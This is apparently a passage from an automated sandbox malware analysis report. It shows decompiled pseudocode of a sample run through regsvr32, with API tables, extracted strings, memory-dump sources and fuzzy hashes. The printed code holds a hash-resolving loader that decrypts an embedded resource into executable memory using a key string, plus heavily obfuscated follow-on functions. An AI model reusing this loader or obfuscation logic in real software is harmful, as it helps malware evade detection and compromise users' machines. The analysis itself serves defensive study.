				void* _t195;
				intOrPtr _t200;

				if( *((intOrPtr*)(_t190 + 8)) != 1) {
					L6:
					return 1;
				} else {
					if(E10004850() != 0) {
						_push(0x1002b948);
						E100113E5(_t125, _t151, _t161, __eflags);
						__eflags = 0;
						return 0;
					} else {
						 *0x1003610c = 0;
						 *0x10036110 = 0;
						 *0x10036114 = 0;
						 *0x1003611c = 0;
						 *0x10036118 = 0;
						 *0x10036120 = 0;
						 *0x10036124 = 0;
						_t55 = E100011D0();
						_t162 = _t55;
						_t56 = E100011D0();
						_t152 = E100011D0();
						_t58 = E10001440();
						 *0x10038158 = _t58;
						_t59 = E10001440();
						 *0x10038150 = _t59;
						_t60 = E10001440();
						 *0x10038154 = _t60;
						_t61 = E10001440();
						 *0x1003814c = _t61;
						_t62 = E10001440();
						 *0x10038148 = _t62;
						_t63 = E10001440();
						 *0x10038144 = _t63;
						_t64 = E10001440();
						 *0x10038140 = _t64;
						_t65 = E10001440();
						 *0x10038198 = _t65;
						_t66 = E10001440();
						 *0x10038194 = _t66;
						_t67 = E10001440();
						 *0x10038190 = _t67;
						_t68 = E10001440();
						 *0x1003818c = _t68;
						_t69 = E10001440();
						 *0x10038188 = _t69;
						_t70 = E10001440();
						 *0x10038184 = _t70;
						_t71 = E10001440();
						 *0x10038180 = _t71;
						_t72 = E10001440();
						 *0x1003817c = _t72;
						_t73 = E10001440();
						_t194 = _t190 + 0xc8;
						 *0x10038178 = _t73;
						_t74 = E10001440();
						 *0x10038174 = _t74;
						_t75 = E10001440();
						 *0x10038170 = _t75;
						_t76 = E10001440();
						 *0x1003816c = _t76;
						_t77 = E10001440();
						 *0x10038168 = _t77;
						_t127 = E10001440();
						 *0x10038164 = _t127;
						_t79 = E10001440();
						 *0x10038160 = _t79;
						_t80 = E10001440();
						_t153 =  *(_t194 + 0x54);
						_t195 = _t194 + 0x38;
						 *0x1003815c = _t80;
						_t163 =  *_t127(_t153, 0x869f, 0x1002b96c, _t162, 0x1fec9b60, _t162, 0x745026d3, _t162, 0x3c929de2, _t162, 0xcd105606, _t162, 0x50054c9a, _t162, 0xc8d0ee0e, _t162, 0x51c62d76, _t56, 0x4f1b267e, _t162, 0xedcda0b5, _t162, 0x2f4bd8ff, _t162, 0x5d4ffe0a, _t162, 0x5a88c773, _t162, 0x2408370b, _t162, 0x84cccc02, _t162, 0x596365ef, _t162, 0x72b3cdac, _t152, 0x5eb174cb, _t152, 0x5f0970d0, _t152, 0x47a97482, _t152, 0xeb1a33a4, _t152, 0xd0ad2455, _t152, 0x5e4932f6, _t152, 0x5d0132fa, 0x106d66fc, 0x108d4cdc, 0x156af904, 0x20e23fe3, 0xe094f82, 0xf4f8d3c5, 0x3446e98c, 0x348b2998, 0x118db97f, 0x2d34cc91, 0x1c9cdc39, 0xeff9eb82, 0x28b4cee6, 0x31c6c0a1, 0x628ad09, 0x1a322e2e, 0x3801a8f2, 0xb0b0d9a7, _t151, _t161, _t170, _t125);
						 *((intOrPtr*)(_t195 + 0x1c)) = LoadResource(_t153, _t163);
						_t83 = SizeofResource(_t153, _t163);
						_t154 =  *0x1003610c; // 0x0
						_t128 = _t83;
						_t200 =  *0x10038194; // 0x76ec66e0
						if(_t200 == 0) {
							_t130 =  *0x10036114; // 0x0
							_t138 =  *0x10036118; // 0x0
							_t164 =  *0x10036120; // 0x0
							_t172 =  *0x10036110; // 0x0
							 *((intOrPtr*)(_t195 + 0x20)) = ((_t130 - _t138) * _t138 + _t164) * _t154 - _t172 + (((_t130 - _t138) * _t138 + _t164) * _t154 - _t172) * 2;
							_t94 = (_t164 + _t172 * 2 + (_t164 + _t172 * 2) * 2 - 9) *  *0x1003611c +  *((intOrPtr*)(_t195 + 0x20));
							_t33 = _t154 + 2; // 0x2
							 *((intOrPtr*)(_t195 + 0x20)) = _t154 + _t33;
							_t177 = _t164 * _t154 * 0x7fffffff;
							 *((intOrPtr*)(_t195 + 0x10)) = _t94;
							_t96 =  *0x10036110; // 0x0
							_t37 = _t177 + 0x7ffffffe; // 0x7ffffffe
							_t40 = _t154 * 2; // 0x80000ffe
							_t134 = ((_t130 - _t96) *  *(_t195 + 0x24) + (0x7fffffff - _t164) * 0x00000002) *  *0x1003611c + ((_t96 + _t37) * _t130 + _t40 + 0x00001000 + _t138 * 0x7fffffff) * 0x00000002 |  *(_t195 + 0x14) + 0x00001000;
							__eflags = _t134;
							_t99 = VirtualAlloc(0, _t128, _t134, _t94 + 0x40);
						} else {
							_t136 =  *0x10036110; // 0x0
							_t144 =  *0x10036114; // 0x0
							_t4 = _t144 + 1; // 0x1
							_t169 =  *0x10036120; // 0x0
							_t6 = _t136 * 2; // 0x6
							_t184 =  *0x10036118; // 0x0
							_t22 = ((_t144 + 1) * _t154 - _t169 + 0x7fffffff) * _t136 + (_t154 + 0x7fffffff) * _t169 + 0x2000; // -2147475454
							_t99 =  *0x10038194(0xffffffff, 0, _t128, ((_t144 - _t184) * _t184 + _t169) * _t154 + ((_t144 - _t184) * _t184 + _t169) * _t154 * 0x00000002 + (_t169 + _t136 * 0x00000002 + (_t169 + _t136 * 0x00000002) * 0x00000002 - 0x00000009) *  *0x1003611c - _t136 + _t136 * 0x00000002 + 0x00001000 | ((_t144 + 0x00000001) * _t154 - _t169 + 0x7fffffff) * _t136 + (_t154 + 0x7fffffff) * _t169 + _t22, (1 - _t154) * _t136 + _t4 *  *0x1003611c + 2 - (_t136 + _t6 + 6) * _t169 - _t144 + _t144 * 2 + 0x40, 0); // executed
						}
						_t165 = _t99;
						memcpy(_t165,  *(_t195 + 0x14), _t128);
						_t102 = malloc(0xf04); // executed
						_t157 = _t102;
						E10001820();
						E100020F0();
						 *0x10038154(_t157, 0x39fc4527, 0xfc9810f7, 0x2aab42ff, _t157, _t165, _t128, 0xed9e0cf, 0x96c3a441, 0x245e78a3, _t157, "NF*0%*F&PYU5D%V9U95IUUEULekAEq3Pu5RqsL?trX3nqllo^cOx4B+9FZlBRW1nyLkdCsMgQU7I>?QhmoVV8+FY)cGeoWD7iQWK5P", 0x67);
						_t106 = E10004BB0();
						 *0x100381a0 = _t106;
						 *0x1003819c( *((intOrPtr*)(_t195 + 0x80)), 1, 0, _t165, _t128, E10003EB0, E10003ED0, E10003EF0, E10003F50, E10003F70, 0);
						goto L6;
					}
				}
			}

0x10005fd8
0x10006427
0x1000642f
0x10005fde
0x10005fe5
0x10006432
0x10006437
0x1000643f
0x10006444
0x10005feb
0x1000600f
0x10006015
0x1000601b
0x10006021
0x10006027
0x1000602d
0x10006033
0x10006039
0x1000605c
0x1000605e
0x1000608b
0x10006093
0x1000609e
0x100060a3
0x100060ae
0x100060b3
0x100060be
0x100060c3
0x100060ce
0x100060d3
0x100060de
0x100060e3
0x100060ee
0x100060f3
0x100060fe
0x10006103
0x10006111
0x10006116
0x10006121
0x10006126
0x10006131
0x10006136
0x10006141
0x10006146
0x10006151
0x10006156
0x10006161
0x10006166
0x10006171
0x10006176
0x10006181
0x10006186
0x1000618b
0x10006194
0x10006199
0x100061a4
0x100061a9
0x100061b4
0x100061b9
0x100061c4
0x100061c9
0x100061d4
0x100061de
0x100061e6
0x100061ec
0x100061f7
0x100061fc
0x10006201
0x10006205
0x10006213
0x1000621a
0x10006226
0x1000622a
0x10006230
0x10006236
0x10006238
0x1000623e
0x100062e6
0x100062ec
0x100062f2
0x100062f8
0x10006315
0x1000632b
0x1000632d
0x10006331
0x1000633a
0x10006340
0x10006348
0x1000634d
0x1000635e
0x10006385
0x10006385
0x1000638b
0x10006244
0x10006244
0x1000624a
0x10006250
0x10006266
0x1000626d
0x1000627e
0x100062cc
0x100062db
0x100062db
0x10006391
0x1000639a
0x100063a5
0x100063b2
0x100063c4
0x100063db
0x100063e4
0x10006407
0x10006418
0x1000641d
0x00000000
0x10006426
0x10005fe5

APIs

LoadResource.KERNEL32(?,00000000), ref: 1000621E
SizeofResource.KERNEL32(?,00000000), ref: 1000622A
VirtualAllocExNuma.KERNELBASE(000000FF,00000000,00000000,-00001000,-0000003F,00000000), ref: 100062DB
VirtualAlloc.KERNEL32(00000000,00000000,?,?), ref: 1000638B
memcpy.MSVCRT ref: 1000639A
malloc.MSVCRT ref: 100063A5
??3@YAXPAX@Z.MSVCRT ref: 100063E4

Strings

NF*0%*F&PYU5D%V9U95IUUEULekAEq3Pu5RqsL?trX3nqllo^cOx4B+9FZlBRW1nyLkdCsMgQU7I>?QhmoVV8+FY)cGeoWD7iQWK5P, xrefs: 100063AD
`gv, xrefs: 10006151

Memory Dump Source

Source File: 00000002.00000002.415597356.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.415592925.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415709895.000000001002B000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415778700.0000000010036000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.415806032.000000001003C000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd

Similarity

API ID: AllocResourceVirtual$??3@LoadNumaSizeofmallocmemcpy
String ID: NF*0%*F&PYU5D%V9U95IUUEULekAEq3Pu5RqsL?trX3nqllo^cOx4B+9FZlBRW1nyLkdCsMgQU7I>?QhmoVV8+FY)cGeoWD7iQWK5P$`gv
API String ID: 1108135221-4266834519
Opcode ID: 709cbee12aeba38ee5f55d833185045112468640c15698cf672df178b0078bb3
Instruction ID: b041f92eca5ba3fdc6980204e7f93ec9d4e673b14fddfdf5e513b5c7e773d603
Opcode Fuzzy Hash: 709cbee12aeba38ee5f55d833185045112468640c15698cf672df178b0078bb3
Instruction Fuzzy Hash: 4BB13A71900325AFF701DF75CD86E967BACEB4A384B04851AF600EB277EB70B6118B95

Uniqueness

Uniqueness Score: -1.00%

Function 04F6BB44 Relevance: 10.4, Strings: 8, Instructions: 372
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E04F6BB44(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				char _v520;
				char _v1040;
				intOrPtr _v1044;
				intOrPtr _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				void* _t388;
				void* _t390;
				void* _t397;
				signed int _t426;
				void* _t431;
				intOrPtr _t436;
				signed int _t445;
				signed int _t446;
				signed int _t447;
				signed int _t448;
				intOrPtr _t450;
				signed int _t452;
				signed int _t453;
				signed int _t454;
				signed int _t457;
				signed int _t458;
				signed int _t463;
				void* _t498;
				signed int _t499;
				signed int* _t504;

				_push(_a8);
				_t498 = 0;
				_push(_a4);
				_push(0);
				_push(__ecx);
				E04F732C4(_t388);
				_v1056 = 0x7233;
				_v1052 = 0x59a75;
				_t504 =  &(( &_v1080)[4]);
				_v1048 = 0x499bf;
				_t390 = 0x87356;
				_v1044 = 0x13dcf;
				while(1) {
					L1:
					_t445 = 0x1a;
					_t499 = 0x15;
					do {
						while(_t390 != 0x20fe3) {
							if(_t390 == 0x87356) {
								_v1068 = 0x9854c;
								_v1068 = _v1068 + 0xffffe8b6;
								_v1068 = _v1068 | 0x01e5fab2;
								_v1068 = _v1068 ^ 0x01edfe9b;
								_v1064 = 0x5c94d;
								_v1064 = _v1064 ^ 0x237e5b26;
								_v1064 = _v1064 ^ 0x0912cbbe;
								_v1064 = _v1064 ^ 0x2a652951;
								_v1080 = 0x34f93f;
								_v1080 = _v1080 << 0x10;
								_v1080 = _v1080 / _t445;
								_v1080 = _v1080 << 8;
								_v1080 = _v1080 ^ 0x96177c5b;
								_v1072 = 0x500779;
								_v1072 = _v1072 + 0x9eb6;
								_v1072 = _v1072 | 0x0d662e3a;
								_t168 =  &_v1072; // 0xd662e3a
								_v1072 =  *_t168 / _t499;
								_v1072 = _v1072 ^ 0x00a7e533;
								_v1060 = 0x3bc945;
								_v1060 = _v1060 + 0xffff3c95;
								_v1060 = _v1060 << 3;
								_v1060 = _v1060 ^ 0x01d264b9;
								_v1076 = 0x4594e7;
								_v1076 = _v1076 + 0xffffc4b5;
								_v1076 = _v1076 << 0xc;
								_v1076 = _v1076 ^ 0x559cb27e;
								E04F79F8B(_v1068,  *_t168 % _t499, _t445, _v1064,  &_v1040, _v1080, _v1072, _t445, _v1060, _v1076);
								_t504 =  &(_t504[8]);
								_t390 = 0x20fe3;
								_t445 = 0x1a;
								continue;
							} else {
								if(_t390 == 0xaddd6) {
									_v1080 = 0xf13477;
									_v1080 = _v1080 ^ 0xf01b0b22;
									_v1080 = _v1080 ^ 0xf0e1ae65;
									_v1072 = 0x974891;
									_v1072 = _v1072 >> 9;
									_v1072 = _v1072 ^ 0x00032dcf;
									_v1076 = 0x6cee2;
									_t457 = 0x75;
									_v1076 = _v1076 / _t457;
									_t458 = 0x60;
									_v1076 = _v1076 / _t458;
									_v1076 = _v1076 ^ 0x000f65d7;
									_v1060 = 0x917d48;
									_v1060 = _v1060 << 0x10;
									_v1060 = _v1060 ^ 0x7d44d115;
									_v1068 = 0x53d;
									_v1068 = _v1068 * 0x52;
									_v1068 = _v1068 + 0xffff5202;
									_v1068 = _v1068 ^ 0x00027625;
									_t426 = E04F73B17(_v1080, 0, __eflags, _v1072, _t458, _v1076,  &_v520, _v1060, _t498, _t498, _v1068); // executed
									__eflags = _t426;
									_t498 =  !=  ? 1 : _t498;
								} else {
									_t511 = _t390 - 0xadf77;
									if(_t390 != 0xadf77) {
										goto L9;
									} else {
										_v1080 = 0xfaa9a9;
										_v1080 = _v1080 / _t445;
										_v1080 = _v1080 + 0xffff9fc9;
										_v1080 = _v1080 << 5;
										_v1080 = _v1080 ^ 0x0122a24f;
										_v1064 = 0x725612;
										_v1064 = _v1064 * 0x11;
										_v1064 = _v1064 + 0xa9b2;
										_v1064 = _v1064 * 0x2a;
										_v1064 = _v1064 ^ 0x3ef6f8d7;
										_v1060 = 0xe14c90;
										_v1060 = _v1060 ^ 0x609c3e11;
										_v1060 = _v1060 >> 1;
										_v1060 = _v1060 ^ 0x30328548;
										_v1076 = 0x9add5c;
										_v1076 = _v1076 + 0x4e1;
										_v1076 = _v1076 >> 2;
										_v1076 = _v1076 ^ 0x00213ead;
										_t431 = E04F7D6A7(_v1080, _v1064, _v1060, 0x4f6149c, _v1076);
										_v1064 = 0xc8f650;
										_v1064 = _v1064 + 0xffff160f;
										_v1064 = _v1064 >> 0xa;
										_v1064 = _v1064 >> 5;
										_v1064 = _v1064 ^ 0x000a1f49;
										_v1072 = 0x57f70a;
										_v1072 = _v1072 << 3;
										_v1072 = _v1072 ^ 0x02b507d6;
										_v1060 = 0x235790;
										_v1060 = _v1060 + 0xb269;
										_v1060 = _v1060 ^ 0x002ebf2f;
										_v1080 = 0x79afa4;
										_v1080 = _v1080 >> 0xc;
										_v1080 = _v1080 + 0x7156;
										_v1080 = _v1080 ^ 0xcde8ca48;
										_v1080 = _v1080 ^ 0xcde53190;
										_v1068 = 0x828251;
										_t463 = 0x58;
										_v1068 = _v1068 / _t463;
										_v1068 = _v1068 ^ 0x00043556;
										_v1076 = 0xd74c0a;
										_v1076 = _v1076 >> 5;
										_v1076 = _v1076 + 0x7fcb;
										_v1076 = _v1076 ^ 0x00002e74;
										_t436 =  *0x4f8221c; // 0x33fd420
										E04F7BEB5(_v1064, _t511, _v1072, _v1060, 0x104, _v1080, _t436 + 0x220, _t498, _t431, _v1068,  &_v1040, _v1076,  &_v520);
										_v1072 = 0xe1ff82;
										_v1072 = _v1072 + 0xffff4176;
										_v1072 = _v1072 + 0xffff9057;
										_v1072 = _v1072 * 0x1d;
										_v1072 = _v1072 ^ 0x19739cda;
										_v1064 = 0x956cbf;
										_v1064 = _v1064 * 0x7b;
										_v1064 = _v1064 >> 7;
										_v1064 = _v1064 ^ 0x843ed282;
										_v1064 = _v1064 ^ 0x84b70fa9;
										_v1068 = 0xea362c;
										_v1068 = _v1068 | 0x05fa953d;
										_v1068 = _v1068 ^ 0x05f1f1db;
										_v1080 = 0x84e1e0;
										_v1080 = _v1080 ^ 0x8e70dee9;
										_v1080 = _v1080 * 0x2e;
										_v1080 = _v1080 ^ 0x0ac59cf3;
										_v1080 = _v1080 ^ 0xa527d4ab;
										E04F6845B(_v1072, _v1064, _v1068, _v1080, _t431);
										_t504 =  &(_t504[0x11]);
										_t390 = 0xaddd6;
										goto L1;
									}
								}
							}
							L12:
							return _t498;
						}
						_v1076 = 0x766a8b;
						_v1076 = _v1076 >> 4;
						_v1076 = _v1076 ^ 0x0008991d;
						_v1080 = 0x81fa26;
						_t446 = 0x46;
						_v1080 = _v1080 / _t446;
						_v1080 = _v1080 + 0x8b0e;
						_v1080 = _v1080 << 7;
						_v1080 = _v1080 ^ 0x0136b994;
						_v1072 = 0x784033;
						_t216 =  &_v1072; // 0x784033
						_t447 = 7;
						_v1072 =  *_t216 / _t447;
						_v1072 = _v1072 + 0xffff1d89;
						_v1072 = _v1072 + 0xaed8;
						_v1072 = _v1072 ^ 0x00150504;
						_v1068 = 0x7a862d;
						_t448 = 0x79;
						_v1068 = _v1068 / _t448;
						_v1068 = _v1068 ^ 0x000fbe1b;
						_t397 = E04F7D6A7(_v1076, _v1080, _v1072, 0x4f6140c, _v1068);
						_v1076 = 0x5e9e26;
						_v1076 = _v1076 ^ 0x8f082e61;
						_v1076 = _v1076 + 0xffff9e9a;
						_v1076 = _v1076 + 0x74ad;
						_v1076 = _v1076 ^ 0x8f58ffec;
						_v1068 = 0xc2fdde;
						_v1068 = _v1068 + 0xf028;
						_v1068 = _v1068 ^ 0x00c44802;
						_v1060 = 0x48684f;
						_v1060 = _v1060 + 0x56be;
						_v1060 = _v1060 ^ 0x75914993;
						_v1060 = _v1060 ^ 0xf5039ee0;
						_v1060 = _v1060 ^ 0x80dffca1;
						_v1064 = 0x38be10;
						_v1064 = _v1064 >> 0xe;
						_v1064 = _v1064 + 0xffffb0b4;
						_v1064 = _v1064 ^ 0xfe924df5;
						_v1064 = _v1064 ^ 0x0164fb64;
						_v1080 = 0x9e3736;
						_v1080 = _v1080 ^ 0xe59be1d9;
						_v1080 = _v1080 * 0x50;
						_v1080 = _v1080 << 2;
						_v1080 = _v1080 ^ 0x474c176d;
						_v1072 = 0xe86b4f;
						_t283 =  &_v1072; // 0xe86b4f
						_v1072 =  *_t283 * 0x14;
						_v1072 = _v1072 >> 0xe;
						_v1072 = _v1072 + 0x3409;
						_v1072 = _v1072 ^ 0x000f16f5;
						_t450 =  *0x4f8221c; // 0x33fd420
						_t293 = _t450 + 4; // 0x33fd424
						_t295 = _t450 + 0x220; // 0x33fd640
						E04F7F342(_v1068, __eflags, _v1060, _t450, _v1064, _t397, _v1080, _t295,  &_v520, _t293, _v1072,  &_v1040);
						_v1060 = 0xa96ea1;
						_v1060 = _v1060 + 0xffffd331;
						_t452 = 0x7a;
						_v1060 = _v1060 / _t452;
						_v1060 = _v1060 ^ 0x0009d19b;
						_v1068 = 0x7876ea;
						_t313 =  &_v1068; // 0x7876ea
						_t453 = 0x42;
						_v1068 =  *_t313 / _t453;
						_v1068 = _v1068 >> 7;
						_v1068 = _v1068 ^ 0x00055edb;
						_v1072 = 0x46e2e9;
						_v1072 = _v1072 + 0xc48c;
						_v1072 = _v1072 ^ 0x00467715;
						_v1076 = 0x8a74c8;
						_t454 = 0x15;
						_v1076 = _v1076 * 6;
						_v1076 = _v1076 / _t454;
						_v1076 = _v1076 ^ 0xfb3f2fca;
						_t339 =  &_v1076;
						 *_t339 = _v1076 ^ 0xfb11dc65;
						__eflags =  *_t339;
						E04F6845B(_v1060, _v1068, _v1072, _v1076, _t397);
						_t504 =  &(_t504[0x10]);
						_t390 = 0xaddd6;
						_t445 = 0x1a;
						_t499 = 0x15;
						L9:
						__eflags = _t390 - 0x534e;
					} while (__eflags != 0);
					goto L12;
				}
			}

0x04f6bb4e
0x04f6bb55
0x04f6bb57
0x04f6bb5e
0x04f6bb5f
0x04f6bb60
0x04f6bb65
0x04f6bb72
0x04f6bb7a
0x04f6bb7d
0x04f6bb85
0x04f6bb87
0x04f6bb94
0x04f6bb94
0x04f6bb96
0x04f6bb99
0x04f6bb9a
0x04f6bb9a
0x04f6bba4
0x04f6be10
0x04f6be1a
0x04f6be22
0x04f6be2a
0x04f6be32
0x04f6be3a
0x04f6be42
0x04f6be4a
0x04f6be52
0x04f6be5a
0x04f6be67
0x04f6be6b
0x04f6be70
0x04f6be78
0x04f6be80
0x04f6be88
0x04f6be90
0x04f6be96
0x04f6be9e
0x04f6bea6
0x04f6beae
0x04f6beb6
0x04f6bebb
0x04f6bec3
0x04f6becb
0x04f6bed3
0x04f6bed8
0x04f6befb
0x04f6bf00
0x04f6bf03
0x04f6bf07
0x00000000
0x04f6bbaa
0x04f6bbaf
0x04f6c198
0x04f6c1a2
0x04f6c1aa
0x04f6c1b2
0x04f6c1ba
0x04f6c1bf
0x04f6c1c7
0x04f6c1d5
0x04f6c1da
0x04f6c1e4
0x04f6c1e9
0x04f6c1ed
0x04f6c1f5
0x04f6c1fd
0x04f6c202
0x04f6c20a
0x04f6c217
0x04f6c222
0x04f6c22a
0x04f6c24a
0x04f6c255
0x04f6c257
0x04f6bbb5
0x04f6bbb5
0x04f6bbba
0x00000000
0x04f6bbc0
0x04f6bbc0
0x04f6bbd0
0x04f6bbd4
0x04f6bbdc
0x04f6bbe1
0x04f6bbe9
0x04f6bbf6
0x04f6bbfa
0x04f6bc07
0x04f6bc0b
0x04f6bc13
0x04f6bc1b
0x04f6bc23
0x04f6bc27
0x04f6bc2f
0x04f6bc37
0x04f6bc3f
0x04f6bc44
0x04f6bc61
0x04f6bc66
0x04f6bc70
0x04f6bc7a
0x04f6bc7f
0x04f6bc84
0x04f6bc8c
0x04f6bc94
0x04f6bc99
0x04f6bca1
0x04f6bca9
0x04f6bcb1
0x04f6bcb9
0x04f6bcc1
0x04f6bcc6
0x04f6bcce
0x04f6bcd6
0x04f6bcde
0x04f6bcec
0x04f6bcef
0x04f6bcfa
0x04f6bd02
0x04f6bd0a
0x04f6bd0f
0x04f6bd17
0x04f6bd2d
0x04f6bd58
0x04f6bd5d
0x04f6bd65
0x04f6bd6d
0x04f6bd7a
0x04f6bd7e
0x04f6bd86
0x04f6bd94
0x04f6bd98
0x04f6bd9d
0x04f6bda5
0x04f6bdad
0x04f6bdb5
0x04f6bdbd
0x04f6bdc5
0x04f6bdcd
0x04f6bdda
0x04f6bdde
0x04f6bde6
0x04f6bdfe
0x04f6be03
0x04f6be06
0x00000000
0x04f6be06
0x04f6bbba
0x04f6bbaf
0x04f6c25a
0x04f6c266
0x04f6c266
0x04f6bf0d
0x04f6bf17
0x04f6bf1c
0x04f6bf24
0x04f6bf32
0x04f6bf37
0x04f6bf3d
0x04f6bf45
0x04f6bf4a
0x04f6bf52
0x04f6bf5a
0x04f6bf5e
0x04f6bf63
0x04f6bf69
0x04f6bf71
0x04f6bf79
0x04f6bf81
0x04f6bf8d
0x04f6bf90
0x04f6bf94
0x04f6bfb1
0x04f6bfb6
0x04f6bfc0
0x04f6bfcb
0x04f6bfd3
0x04f6bfdb
0x04f6bfe3
0x04f6bfeb
0x04f6bff3
0x04f6bffb
0x04f6c003
0x04f6c00b
0x04f6c013
0x04f6c01b
0x04f6c023
0x04f6c02b
0x04f6c030
0x04f6c038
0x04f6c040
0x04f6c048
0x04f6c050
0x04f6c05d
0x04f6c061
0x04f6c066
0x04f6c06e
0x04f6c076
0x04f6c07b
0x04f6c083
0x04f6c088
0x04f6c090
0x04f6c09d
0x04f6c0a3
0x04f6c0af
0x04f6c0cc
0x04f6c0d1
0x04f6c0db
0x04f6c0e9
0x04f6c0ee
0x04f6c0f4
0x04f6c0fc
0x04f6c104
0x04f6c108
0x04f6c10d
0x04f6c113
0x04f6c118
0x04f6c120
0x04f6c128
0x04f6c130
0x04f6c138
0x04f6c145
0x04f6c147
0x04f6c151
0x04f6c155
0x04f6c15d
0x04f6c15d
0x04f6c15d
0x04f6c175
0x04f6c17a
0x04f6c17d
0x04f6c184
0x04f6c187
0x04f6c188
0x04f6c188
0x04f6c188
0x00000000
0x04f6c193

Strings

:.f, xrefs: 04F6BE90
vx, xrefs: 04F6C104
F, xrefs: 04F6C120
3r, xrefs: 04F6BB65
3@x, xrefs: 04F6BF5A
OhH, xrefs: 04F6BFFB
Q)e*, xrefs: 04F6BE4A
,6, xrefs: 04F6BDAD

Memory Dump Source

Source File: 00000002.00000002.415134102.0000000004F61000.00000020.00001000.00020000.00000000.sdmp, Offset: 04F60000, based on PE: true

Associated: 00000002.00000002.415129850.0000000004F60000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.415356193.0000000004F82000.00000004.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_4f60000_regsvr32.jbxd

Yara matches

Similarity

API ID:
String ID: ,6$3@x$3r$:.f$OhH$Q)e*$vx$F
API String ID: 0-756498397
Opcode ID: 507034e7bd472526e7f9f2c4b9872479a8a6d6ffc398fda2a9b9158ebac0dea2
Instruction ID: 05c94aa8d8be2b8ccb71f559cc09857e3e68f1bd20dcf810406789068a3c3565
Opcode Fuzzy Hash: 507034e7bd472526e7f9f2c4b9872479a8a6d6ffc398fda2a9b9158ebac0dea2
Instruction Fuzzy Hash: CA02E1715083829FD358CF65D94984BBBE1FBC9708F008A1DF59996260D3B5DA0A8F87

Uniqueness

Uniqueness Score: -1.00%

Function 04F76F79 Relevance: 9.1, Strings: 7, Instructions: 314
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E04F76F79() {
				char _v524;
				signed int _v532;
				intOrPtr _v536;
				intOrPtr _v540;
				intOrPtr _v544;
				intOrPtr _v548;
				intOrPtr _v552;
				intOrPtr _v556;
				intOrPtr _v560;
				char _v564;
				intOrPtr _v568;
				char _v572;
				signed int _v576;
				signed int _v580;
				intOrPtr _v584;
				signed int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				void* _t317;
				intOrPtr _t326;
				signed int _t329;
				void* _t333;
				intOrPtr _t335;
				signed int _t356;
				signed int _t358;
				signed int _t359;
				char _t361;
				signed int _t364;
				signed int _t367;
				signed int _t368;
				signed int _t373;
				signed int _t374;
				intOrPtr _t385;
				void* _t398;
				void* _t401;

				_v588 = 0x33c60;
				_t317 = 0x49bb9;
				_t357 = _v588;
				_t398 = 0;
				_v584 = 0x8f16b;
				while(_t317 != 0x26298) {
					if(_t317 == 0x49bb9) {
						_t317 = 0x26298;
						continue;
					} else {
						if(_t317 == 0x6bbf8) {
							_v572 = _v572 - E04F75CE1();
							_t317 = 0xa8603;
							asm("sbb [esp+0x3c], edx");
							continue;
						} else {
							if(_t317 == 0x70a44) {
								_t361 = _v572;
								_t326 = _v568;
								_v532 = _v532 & 0x00000000;
								_v560 = _t326;
								_v552 = _t326;
								_v544 = _t326;
								_v536 = _t326;
								_v564 = _t361;
								_v556 = _t361;
								_v548 = _t361;
								_v540 = _t361;
								_v596 = 0x527d26;
								_t216 =  &_v596; // 0x527d26
								_v596 =  *_t216 * 0x4f;
								_v596 = _v596 >> 0xe;
								_v596 = _v596 ^ 0x000448fa;
								_v604 = 0x6693bb;
								_v604 = _v604 | 0xff6509e0;
								_v604 = _v604 + 0xffff5805;
								_v604 = _v604 ^ 0xff6efc04;
								_v608 = 0x26be4e;
								_v608 = _v608 << 5;
								_v608 = _v608 << 0x10;
								_v608 = _v608 << 1;
								_v608 = _v608 ^ 0x93856b9c;
								_v588 = 0xf009db;
								_v588 = _v588 + 0xffff6d52;
								_v588 = _v588 ^ 0x00e657da;
								_t329 = E04F7EEEF(_v596, _t361, _v604,  &_v564, _v608, _v588, _t357); // executed
								_t401 = _t401 + 0x18;
								__eflags = _t329;
								_t317 = 0xaee9a;
								_t398 =  !=  ? 1 : _t398;
								continue;
							} else {
								if(_t317 == 0xa8603) {
									_v592 = 0x2edb81;
									_v592 = _v592 + 0xffff8add;
									_v592 = _v592 + 0xffff1606;
									_v592 = _v592 + 0xffffc392;
									_v592 = _v592 ^ 0x002222fe;
									_v588 = 0x96abe4;
									_v588 = _v588 | 0x794c79ef;
									_v588 = _v588 ^ 0x79dd3976;
									_v600 = 0xed2227;
									_v600 = _v600 ^ 0x1c9b2b00;
									_v600 = _v600 + 0xb9fe;
									_t364 = 0x45;
									_v600 = _v600 / _t364;
									_v600 = _v600 ^ 0x00682e40;
									_v608 = 0xc852fa;
									_v608 = _v608 + 0x520;
									_v608 = _v608 | 0xa63af57e;
									_v608 = _v608 * 0x13;
									_v608 = _v608 ^ 0x64a721a4;
									_t333 = E04F7D6A7(_v592, _v588, _v600, 0x4f613ec, _v608);
									_v608 = 0xed9031;
									_v608 = _v608 << 7;
									_v608 = _v608 + 0xffffcca1;
									_v608 = _v608 + 0xe34c;
									_v608 = _v608 ^ 0x76c2872c;
									_v596 = 0xb2d600;
									_v596 = _v596 + 0xffff5c95;
									_v596 = _v596 + 0xffff2478;
									_v596 = _v596 ^ 0x00b3f10d;
									_v604 = 0x4e70e1;
									_v604 = _v604 + 0x4329;
									_v604 = _v604 ^ 0xe96cf451;
									_v604 = _v604 ^ 0xe921d264;
									_v580 = 0xc74f56;
									_v580 = _v580 + 0xffff094e;
									_v580 = _v580 ^ 0x00c000f7;
									_v588 = 0xe0d45c;
									_v588 = _v588 | 0x7843cf12;
									_v588 = _v588 ^ 0x78e90e56;
									_t335 =  *0x4f8221c; // 0x33fd420
